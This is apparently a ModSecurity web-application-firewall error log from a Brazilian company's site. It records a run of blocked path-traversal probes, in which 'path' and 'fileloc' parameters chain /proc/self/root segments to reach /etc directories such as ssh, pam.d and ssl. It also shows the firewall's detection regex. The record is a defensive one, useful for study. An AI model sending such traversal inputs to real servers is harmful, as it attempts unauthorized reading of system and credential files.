[Wed Mar 18 05:48:33.885262 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:41134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpm4QkwaGbbGflqUZDe0QAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:48:34.990953 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:48612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpm4ta6ubjKNq_cu4ZjlAAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:48:36.331134 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.241.31:41150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpm5OyqAr6etmhZHNqI-AAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:48:42.450526 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.241.31:39514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpm6vu8EFLIOrSqIpvTpAAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:48:52.963887 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:48626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpm9OyqAr6etmhZHNqJCwAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:49:05.056637 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:54866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnAfu8EFLIOrSqIpvTrQAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:49:06.091038 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:39520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnAtY0UrI5A3LftIxkRgAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:49:22.409619 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.241.31:39706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnEuw_le52K8_3pV2uswAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:49:25.144233 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:44826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnFdY0UrI5A3LftIxkUwAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:49:37.590942 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.241.31:44838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnISmAPhZkrhU8w4k8cQAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:49:38.348795 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:57332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnIuyqAr6etmhZHNqJLQAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:49:45.371187 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:51018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnKeoXxyEfFpUF8f86agAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:50:28.721057 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:51034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnVNY0UrI5A3LftIxklgAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:50:37.695323 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:51808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnXQkwaGbbGflqUZDe8QAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:50:56.276304 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:51818] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpncOyqAr6etmhZHNqJVQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:51:12.534083 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:60130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpngCmAPhZkrhU8w4k8iQAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:51:20.357112 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:58608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpniOyqAr6etmhZHNqJXwAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:51:21.673654 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:35844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpniSmAPhZkrhU8w4k8iwAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:51:22.167647 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.241.31:54408] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnisdf6f5d65gmYZSgCgAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:51:24.360794 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:35852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnitY0UrI5A3LftIxksQAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:51:31.021148 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.241.31:39678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnkymAPhZkrhU8w4k8kwAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
